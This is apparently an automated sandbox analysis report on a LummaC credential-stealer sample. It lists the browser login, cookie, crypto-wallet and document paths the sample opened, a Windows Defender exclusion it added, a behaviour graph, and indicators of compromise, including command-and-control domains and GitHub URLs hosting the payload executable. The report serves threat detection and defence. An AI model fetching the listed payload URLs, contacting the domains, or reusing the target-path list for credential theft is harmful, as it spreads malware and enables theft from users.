Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Lipras\pdf.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Searches for user specific document files
Source: C:\Lipras\pdf.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Lipras\pdf.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Lipras\pdf.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ Jump to behavior
Source: C:\Lipras\pdf.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ Jump to behavior
Source: C:\Lipras\pdf.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG Jump to behavior
Source: C:\Lipras\pdf.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG Jump to behavior
Source: C:\Lipras\pdf.exe Directory queried: C:\Users\user\Documents\UOOJJOZIRH Jump to behavior
Source: C:\Lipras\pdf.exe Directory queried: C:\Users\user\Documents\UOOJJOZIRH Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: pdf.exe PID: 7980, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1544948 Sample: file.exe Startdate: 29/10/2024 Architecture: WINDOWS Score: 100 30 seallysl.site 2->30 32 ponintnykqwm.shop 2->32 34 2 other IPs or domains 2->34 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 Yara detected LummaC Stealer 2->46 48 7 other signatures 2->48 8 file.exe 15 6 2->8         started        signatures3 process4 dnsIp5 36 github.com 140.82.121.4, 443, 49730 GITHUBUS United States 8->36 38 raw.githubusercontent.com 185.199.109.133, 443, 49731 FASTLYUS Netherlands 8->38 28 C:\Lipras\pdf.exe, PE32 8->28 dropped 52 Adds a directory exclusion to Windows Defender 8->52 13 pdf.exe 8->13         started        17 powershell.exe 23 8->17         started        19 conhost.exe 8->19         started        file6 signatures7 process8 dnsIp9 40 seallysl.site 172.67.180.76, 443, 49738, 49739 CLOUDFLARENETUS United States 13->40 54 Antivirus detection for dropped file 13->54 56 Multi AV Scanner detection for dropped file 13->56 58 Detected unpacking (changes PE section rights) 13->58 66 5 other signatures 13->66 60 Found many strings related to Crypto-Wallets (likely being stolen) 17->60 62 Adds a directory exclusion to Windows Defender 17->62 64 Loading BitLocker PowerShell Module 17->64 21 powershell.exe 23 17->21         started        24 WmiPrvSE.exe 17->24         started        26 conhost.exe 17->26         started        signatures10 process11 signatures12 50 Loading BitLocker PowerShell Module 21->50
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.199.109.133
 raw.githubusercontent.com Netherlands
54113 FASTLYUS false
140.82.121.4
 github.com United States
36459 GITHUBUS false
172.67.180.76
 seallysl.site United States
13335 CLOUDFLARENETUS true

Contacted Domains

Name IP Active
github.com 140.82.121.4 true
raw.githubusercontent.com 185.199.109.133 true
seallysl.site 172.67.180.76 true
ponintnykqwm.shop unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
contemteny.site true
    		unknown
    opposezmny.site true
      		unknown
      servicedny.site true
        		unknown
        https://github.com/vonuch1/start/raw/refs/heads/main/khtoawdltrha.exe false
          		unknown
          goalyfeastz.site true
            		unknown
            https://raw.githubusercontent.com/vonuch1/start/refs/heads/main/khtoawdltrha.exe false
              		unknown
              authorisev.site true
                		unknown
                faulteyotk.site true
                  		unknown
                  ponintnykqwm.shop true
                    		unknown
                    seallysl.site true
                      		unknown
                      https://seallysl.site/api true
                        		unknown
                        dilemmadu.site true
                          		unknown